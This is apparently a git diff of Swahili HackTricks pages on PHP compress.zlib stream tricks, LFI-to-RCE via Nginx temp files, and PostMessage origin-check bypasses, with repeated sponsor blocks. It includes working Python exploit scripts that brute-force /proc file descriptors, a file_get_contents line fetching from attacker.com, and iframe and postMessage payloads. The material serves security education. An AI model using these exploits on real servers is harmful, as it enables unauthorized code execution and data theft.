* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## `compress.zlib://` na `PHP_STREAM_PREFER_STDIO`
Faili iliyofunguliwa kwa kutumia itifaki ya `compress.zlib://` na bendera ya `PHP_STREAM_PREFER_STDIO` inaweza kuendelea kuandika data ambayo inawasili kwenye uhusiano baadaye kwenye faili hiyo hiyo.
Faili iliyofunguliwa kwa kutumia itifaki ya `compress.zlib://` na bendera `PHP_STREAM_PREFER_STDIO` inaweza kuendelea kuandika data inayofika kwenye uhusiano baadaye kwenye faili hiyo hiyo.
Hii inamaanisha kwamba wito kama huu:
```php
file_get_contents("compress.zlib://http://attacker.com/file")
```
Nitatumia ombi la kuuliza http://attacker.com/file, kisha seva inaweza kujibu ombi hilo na jibu sahihi la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo itaandikwa pia kwenye faili.
Utatuma ombi ukiomba http://attacker.com/file, kisha server inaweza kujibu ombi hilo na jibu halali la HTTP, kuweka uhusiano wazi, na kutuma data ziada baadaye ambayo pia itaandikwa kwenye faili.
Unaweza kuona habari hiyo katika sehemu hii ya msimbo wa php-src katika main/streams/cast.c:
```c
@ -33,20 +46,31 @@ if (flags & PHP_STREAM_PREFER_STDIO) {
*newstream = php_stream_temp_new();
}
```
## Mashindano ya Hali ya Hewa hadi RCE
## Mashindano ya Kukimbia hadi RCE
[**CTF hii**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) ilishindwa kwa kutumia mbinu ya awali.
[**CTF hii**](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer) ilishinduliwa kwa kutumia hila iliyopita.
Mshambuliaji atafanya **seva ya mwathiriwa ifungue uhusiano kusoma faili kutoka kwenye seva ya mshambuliaji** kwa kutumia itifaki ya **`compress.zlib`**.
Mshambuliaji atafanya **seva ya mwathiriwa ifungue uhusiano ikisoma faili kutoka kwa seva za mshambuliaji** kwa kutumia itifaki ya **`compress.zlib`**.
**Wakati** huu **uhusiano** ukiwepo, mshambuliaji atafanya **uchunguzi wa njia** ya faili ya muda iliyoundwa (inavuja na seva).
**Wakati** huu wa **uhusiano** mshambuliaji atafanya **kuchota njia** ya faili ya muda iliyoundwa (inavuja na seva).
**Wakati** uhusiano **bado uko wazi**, mshambuliaji atatumia LFI kuweka faili ya muda ambayo anadhibiti.
**Wakati** huo huo **uhusiano** ukiwa bado wazi, mshambuliaji atatumia LFI kwa **kupakia faili ya muda** ambayo anadhibiti.
Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao **unazuia kupakia faili zinazotumia `<?`**. Kwa hivyo, mshambuliaji atatumia **Hali ya Hewa**. Katika uhusiano ambao bado uko wazi, **mshambuliaji** atatuma mzigo wa PHP BAADA YA **seva ya wavuti** kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini **KABLA haijapakia maudhui yake**.
Hata hivyo, kuna ukaguzi kwenye seva ya wavuti ambao **unazuia kupakia faili zinazohusu `<?`**. Kwa hivyo, mshambuliaji atatumia **Hali ya Mashindano**. Katika uhusiano ambao bado uko wazi **mshambuliaji** atatuma mzigo wa PHP BAADA YA **wavuti** kuchunguza ikiwa faili ina herufi zilizopigwa marufuku lakini **KABLA haijapakia maudhui yake**.
Kwa habari zaidi angalia maelezo ya Hali ya Hewa na CTF katika [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
Kwa habari zaidi angalia maelezo ya Hali ya Mashindano na CTF katika [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumiwa na **dark-web** inayotoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
@ -54,10 +78,10 @@ Kwa habari zaidi angalia maelezo ya Hali ya Hewa na CTF katika [https://balsn.tw
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -2,45 +2,59 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
## Usanidi wenye kasoro
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wame **vamiwa** na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi ya wizi wa habari.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Mpangilio wa Kudhaifu
**[Mfano kutoka https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
* Msimbo wa PHP:
```
````h`
<?php include_once($_GET['file']);
```
* Mazingira ya FPM / PHP:
* Mipangilio ya FPM / PHP:
```
...
php_admin_value[session.upload_progress.enabled] = 0
php_admin_value[file_uploads] = 0
...
```
* Kuweka / kufunga:
```
* Kuweka / kufanya imara:
```bash
...
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
...
```
Bahati nzuri, PHP kwa sasa mara nyingi hutumiwa kupitia PHP-FPM na Nginx. Nginx inatoa kipengele cha [kubadilisha mwili wa mteja](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) ambacho kinaweza kusababisha kuandikwa kwa faili za muda ikiwa mwili wa mteja (si mdogo kwa post) ni kubwa kuliko kizingiti fulani.
Bahati nzuri PHP kwa sasa mara nyingi hutekelezwa kupitia PHP-FPM na Nginx. Nginx inatoa kipengele cha [kubadilisha mwili wa mteja](https://nginx.org/en/docs/http/ngx\_http\_core\_module.html#client\_body\_buffer\_size) ambacho kinaweza kusahauliwa kwa urahisi ambapo itaandika faili za muda ikiwa mwili wa mteja (si tu kikomo cha posta) ni kubwa kuliko kizingiti fulani.
Kipengele hiki kinawezesha LFIs kudukuliwa bila njia nyingine yoyote ya kuunda faili, ikiwa Nginx inaendeshwa kama mtumiaji sawa na PHP (ambayo mara nyingi hufanyika kama www-data).
Kipengele hiki kuruhusu LFIs kutumiwe bila njia nyingine yoyote ya kuunda faili, ikiwa Nginx inaendeshwa kama mtumiaji huyo huyo kama PHP (ambayo mara nyingi hufanywa kama www-data).
Nambari muhimu ya Nginx:
Msimbo muhimu wa Nginx:
```c
ngx_fd_t
ngx_open_tempfile(u_char *name, ngx_uint_t persistent, ngx_uint_t access)
@ -72,9 +86,10 @@ lrwx------ 1 www-data www-data 64 Dec 25 23:57 14 -> socket:[44927]
lrwx------ 1 www-data www-data 64 Dec 25 23:58 15 -> /var/lib/nginx/body/0000001368 (deleted)
...
```
Maelezo: Hapa huwezi kuingiza moja kwa moja `/proc/34/fd/15` kwenye mfano huu kwa sababu PHP's `include` itatatua njia kuwa `/var/lib/nginx/body/0000001368 (imefutwa)` ambayo haipo kwenye mfumo wa faili. Kizuizi kidogo hiki kinaweza kuepukwa kwa kutumia njia ya kuelekeza kama vile: `/proc/self/fd/34/../../../34/fd/15` ambayo mwishowe itatekeleza maudhui ya faili iliyofutwa `/var/lib/nginx/body/0000001368`.
**Maelezo:**
Hakuna uwezekano wa moja kwa moja kujumuisha `/proc/34/fd/15` katika mfano huu kwa sababu PHP's `include` itatatua njia kuwa `/var/lib/nginx/body/0000001368 (deleted)` ambayo haipo kwenye mfumo wa faili. Kizuizi hiki kidogo kinaweza kuepukwa kwa njia ya kuelekeza kama vile: `/proc/self/fd/34/../../../34/fd/15` ambayo mwishowe itatekeleza maudhui ya faili iliyofutwa ya `/var/lib/nginx/body/0000001368`.
## Uvamizi Kamili
## Kufaidika Kamili
```python
#!/usr/bin/env python3
import sys, threading, requests
@ -143,35 +158,11 @@ for pid in nginx_workers:
a = threading.Thread(target=bruter, args=(pid, ))
a.start()
```
# LFI to RCE via Nginx Temp Files
### LFI to RCE via Nginx temp files
## Introduction
Njia hii inahusisha kuchapisha faili za muda za Nginx kwa kutumia njia ya kuingiza faili (LFI). Unaweza kutumia hili kufikia udhibiti wa kijijini wa seva ya Nginx. Kwa kufanya hivyo, unaweza kusoma faili za muda zilizoundwa na Nginx, na kuzitumia kutekeleza msimbo wako kwa njia ya mbali. Hii inaweza kusababisha kutekelezwa kwa msimbo mbaya kwenye seva ya lengwa.
In some cases, a Local File Inclusion (LFI) vulnerability can be escalated to Remote Code Execution (RCE) by exploiting temporary files created by the Nginx web server. This technique can be used to gain unauthorized access to the target system and execute arbitrary commands.
## Exploitation
1. Identify the LFI vulnerability: Look for user-controllable input points where file inclusion is possible, such as URL parameters or cookies.
2. Exploit the LFI vulnerability: Inject a payload that includes the path to the Nginx temporary directory. This can be achieved by appending the payload to the file parameter, for example: `http://example.com/index.php?page=/var/tmp/nginx/client_body/xxxxx.php`.
3. Trigger the creation of a temporary file: Access the URL containing the payload to trigger the creation of the temporary file on the server.
4. Execute the payload: Access the temporary file by appending its name to the URL, for example: `http://example.com/index.php?page=/var/tmp/nginx/client_body/xxxxx.php`.
## Mitigation
To prevent LFI to RCE via Nginx temp files, consider the following mitigation techniques:
- Input validation: Implement strict input validation to prevent malicious file inclusion.
- File permissions: Ensure that the Nginx temporary directory has appropriate permissions to prevent unauthorized access.
- File deletion: Regularly clean up temporary files to minimize the risk of exploitation.
- Web server hardening: Follow best practices for securing the Nginx web server, such as disabling unnecessary features and applying security patches.
By implementing these mitigation techniques, you can reduce the risk of LFI to RCE via Nginx temp files and enhance the security of your web application.
Kwa kawaida, faili za muda za Nginx zinapatikana kwenye saraka kama `/var/lib/nginx/tmp/client_body/`. Unaweza kutumia LFI kusoma faili hizi za muda, na kisha kutumia udhibiti huo kutekeleza msimbo wako kwa njia ya mbali. Kumbuka kwamba mbinu hii inahitaji ufikiaji wa awali wa LFI kwenye seva ya Nginx.
```
$ ./pwn.py 127.0.0.1 1337
[*] cpus: 2; pid_max: 32768
@ -197,7 +188,7 @@ $ ./pwn.py 127.0.0.1 1337
[+] brute loop restarted: 34
[!] /proc/self/fd/34/../../../34/fd/9: uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
### Shambulizi Lingine
### Mbinu Nyingine
Hii ni kutoka [https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/](https://lewin.co.il/winning-the-impossible-race-an-unintended-solution-for-includers-revenge-counter-hxp-2021/)
```python
@ -306,16 +297,28 @@ read_file_multiprocess(requests_session, nginx_pids)
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na zisizo za habari za kuiba.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>

View file

@ -1,6 +1,6 @@
# Mapungufu ya PostMessage
# Madokezo ya PostMessage
## Mapungufu ya PostMessage
## Madokezo ya PostMessage
<details>
@ -8,7 +8,7 @@
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJISAJILI**](https://github.com/sponsors/carlospolop)!
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
@ -16,6 +16,20 @@ Njia nyingine za kusaidia HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**.
Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa.
Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa:
{% embed url="https://whiteintel.io" %}
---
## Tuma **PostMessage**
**PostMessage** hutumia kazi ifuatayo kutuma ujumbe:
@ -46,12 +60,12 @@ win[0].postMessage('{"__proto__":{"isAdmin":True}}', '*')
```
Tafadhali kumbuka kwamba **targetOrigin** inaweza kuwa '\*' au URL kama _https://company.com._\
Katika **skenario ya pili**, **ujumbe unaweza kutumwa tu kwa kikoa hicho** (hata kama asili ya kitu cha dirisha ni tofauti).\
Ikiwa **alama ya joker** inatumika, **ujumbe unaweza kutumwa kwa kikoa chochote**, na utatumwa kwa asili ya kitu cha Dirisha.
Ikiwa **alama ya joker** inatumika, **ujumbe unaweza kutumwa kwa kikoa chochote**, na utatumwa kwa asili ya kitu cha Dirisha.
### Kuvamia iframe & alama ya joker katika **targetOrigin**
Kama ilivyoelezwa katika [**ripoti hii**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) ikiwa utapata ukurasa ambao unaweza **kuingizwa kwenye iframe** (bila ulinzi wa `X-Frame-Header`) na unatuma ujumbe wa **hisia** kupitia **postMessage** ukitumia **alama ya joker** (\*), unaweza **kubadilisha** asili ya **iframe** na **kuvuja** ujumbe wa **hisia** kwenda kwa kikoa kinachodhibitiwa na wewe.\
Tafadhali kumbuka kwamba ikiwa ukurasa unaweza kuingizwa kwenye iframe lakini **targetOrigin** imewekwa kwa URL na sio kwa alama ya joker, **hila hii haitafanya kazi**.
Kama ilivyoelezwa katika [**ripoti hii**](https://blog.geekycat.in/google-vrp-hijacking-your-screenshots/) ikiwa utapata ukurasa ambao unaweza **kuingizwa** (bila ulinzi wa `X-Frame-Header`) na ambao unatuma ujumbe wa **hisia** kupitia **postMessage** ukitumia **alama ya joker** (\*), unaweza **kubadilisha** **asili** ya **iframe** na **kuvuja** ujumbe wa **hisia** kwenda kwa kikoa kinachodhibitiwa na wewe.\
Tafadhali kumbuka kwamba ikiwa ukurasa unaweza kuingizwa lakini **targetOrigin** imewekwa kwa URL na sio kwa alama ya joker**, **hila hii haitafanya kazi**.
```markup
<html>
<iframe src="https://docs.google.com/document/ID" />
@ -78,38 +92,38 @@ return;
// ...
}, false);
```
Katika kesi hii angalia jinsi **jambo la kwanza** ambalo msimbo unafanya ni **kuangalia asili**. Hii ni muhimu sana hasa ikiwa ukurasa utafanya **kitu nyeti** na habari iliyopokelewa (kama kubadilisha nenosiri). **Ikiwa haitaangalia asili, wachomaji wanaweza kufanya waathiriwa watume data za kupotosha kwa vituo hivi** na kubadilisha nywila za waathiriwa (kwa mfano huu).
Katika kesi hii, **jambo la kwanza** ambalo msimbo unafanya ni **kuangalia asili**. Hii ni muhimu sana hasa ikiwa ukurasa utafanya **kitu nyeti** na habari iliyopokelewa (kama kubadilisha nenosiri). **Ikiwa haitoiangalia asili, wachomaji wanaweza kufanya waathiriwa watume data ya kupendelea kwa vituo hivi** na kubadilisha nywila za waathiriwa (katika mfano huu).
### Uchambuzi
Kwa lengo la **kupata wasikilizaji wa tukio** kwenye ukurasa wa sasa unaweza:
* **Tafuta** msimbo wa JS kwa `window.addEventListener` na `$(window).on` (_toleo la JQuery_)
* **Tekeleza** kwenye konsoli ya zana ya developer: `getEventListeners(window)`
* **Tekeleza** kwenye kikasha cha zana cha watengenezaji: `getEventListeners(window)`
![](<../../.gitbook/assets/image (618) (1).png>)
* **Nenda** _Elements --> Wasikilizaji wa Tukio_ katika zana za developer ya kivinjari
* **Nenda** _Elements --> Wasikilizaji wa Tukio_ katika zana za watengenezaji wa kivinjari
![](<../../.gitbook/assets/image (393).png>)
* Tumia **kifaa cha kivinjari** kama [**https://github.com/benso-io/posta**](https://github.com/benso-io/posta) au [https://github.com/fransr/postMessage-tracker](https://github.com/fransr/postMessage-tracker). Vifaa hivi vya kivinjari vitakapo **kukamata ujumbe wote** na kuwaonyesha.
### Pita kwenye Uchunguzi wa Asili
### Pita kuthibitisha asili
* Sifa ya **`event.isTrusted`** inachukuliwa kuwa salama kwani inarudisha `True` tu kwa matukio yaliyozalishwa na hatua halisi za mtumiaji. Ingawa ni changamoto kuihepa ikiwa imefanywa kwa usahihi, umuhimu wake katika ukaguzi wa usalama ni muhimu.
* Matumizi ya **`indexOf()`** kwa ukaguzi wa asili katika matukio ya PostMessage yanaweza kuwa rahisi kuihepa. Mfano unaoonyesha udhaifu huu ni:
* Sifa ya **`event.isTrusted`** inachukuliwa kuwa salama kwani inarudisha `True` tu kwa matukio yaliyotengenezwa na hatua halisi za mtumiaji. Ingawa ni changamoto kuihepa ikiwa imefanywa kwa usahihi, umuhimu wake katika ukaguzi wa usalama ni muhimu.
* Matumizi ya **`indexOf()`** kwa uthibitisho wa asili katika matukio ya PostMessage yanaweza kuwa rahisi kuihepa. Mfano unaoonyesha udhaifu huu ni:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
* Mbinu ya **`search()`** kutoka `String.prototype.search()` inalenga kwa mizani ya kawaida, sio herufi. Kupitisha kitu kingine isipokuwa mizani ya kawaida kunapelekea uongofu wa lazima kuwa mizani, hivyo kufanya mbinu kuwa na hatari. Hii ni kwa sababu katika mizani, kipande (.) hufanya kama kichujio, kuruhusu kuihepa uthibitisho na uwanja ulioandaliwa kwa makini. Kwa mfano:
* Mbinu ya **`search()`** kutoka `String.prototype.search()` inalenga kwa mizani ya kawaida, sio maneno. Kupitisha kitu kingine isipokuwa regexp husababisha ubadilishaji wa lazima kuwa regex, hivyo kufanya mbinu kuwa hatarini. Hii ni kwa sababu katika regex, kipande (.) hufanya kama kichwa, kuruhusu kuihepa uthibitisho na uwanja ulioandaliwa kwa ustadi. Kwa mfano:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
* Kazi ya **`match()`**, kama `search()`, inashughulikia mizani. Ikiwa mizani ni dhaifu kimuundo, inaweza kuwa rahisi kuihepa.
* Kazi ya **`escapeHtml`** inalenga kusafisha vipengele kwa kutoroka herufi. Hata hivyo, haifanyi kitu kipya kilichotoroka bali inabadilisha mali za kitu kilichopo. Tabia hii inaweza kutumika vibaya. Hasa, ikiwa kitu kinaweza kudhibitiwa hivi kwamba mali yake inayodhibitiwa haikubali `hasOwnProperty`, `escapeHtml` haitafanya kama ilivyotarajiwa. Hii inaonyeshwa katika mifano hapa chini:
* Kazi ya **`match()`**, kama `search()`, inashughulikia regex. Ikiwa regex haijajengwa kwa usahihi, inaweza kuwa rahisi kuihepa.
* Kazi ya **`escapeHtml`** inalenga kusafisha vipande kwa kutoroka wahusika. Hata hivyo, haifanyi kitu kipya kilichotoroka bali inabadilisha mali za kitu kilichopo. Tabia hii inaweza kutumika vibaya. Hasa, ikiwa kitu kinaweza kubadilishwa ili mali yake inayodhibitiwa isikubali `hasOwnProperty`, `escapeHtml` haitafanya kama ilivyotarajiwa. Hii inaonyeshwa katika mifano hapa chini:
* Kukosekana kwa Matarajio:
@ -128,15 +142,15 @@ result.message; // "'"<b>\"
Katika muktadha wa udhaifu huu, kitu cha `File` kinafaa kutumiwa kwa sababu ya mali yake ya kusoma tu ya `name`. Mali hii, inapotumiwa katika templeti, haifanyi safishwa na kazi ya `escapeHtml`, ikiongoza kwa hatari za usalama.
* Mali ya `document.domain` katika JavaScript inaweza kuwekwa na skripti ili kupunguza kikoa, kuruhusu utekelezaji wa sera sawa ya asili ndani ya kikoa kimoja cha mzazi.
* Mali ya `document.domain` katika JavaScript inaweza kuwekwa na hati ya kufupisha uwanja, kuruhusu utekelezaji wa sera sawa ya asili ndani ya uwanja wa mzazi mmoja.
### Kuihepa `e.origin == window.origin`
### Kuihepa e.origin == window.origin
Wakati wa kuingiza ukurasa wa wavuti ndani ya **sandboxed iframe** kwa kutumia %%%%%%, ni muhimu kuelewa kuwa asili ya iframe itawekwa kwa null. Hii ni muhimu hasa unaposhughulika na **vipengele vya sandbox** na matokeo yake kwa usalama na utendaji.
Wakati wa kuingiza ukurasa wa wavuti ndani ya **iframe iliyofungwa** kwa kutumia %%%%%%, ni muhimu kuelewa kuwa asili ya iframe itawekwa kwa null. Hii ni muhimu hasa unaposhughulika na **vipengele vya sanduku** na matokeo yake kwa usalama na utendaji.
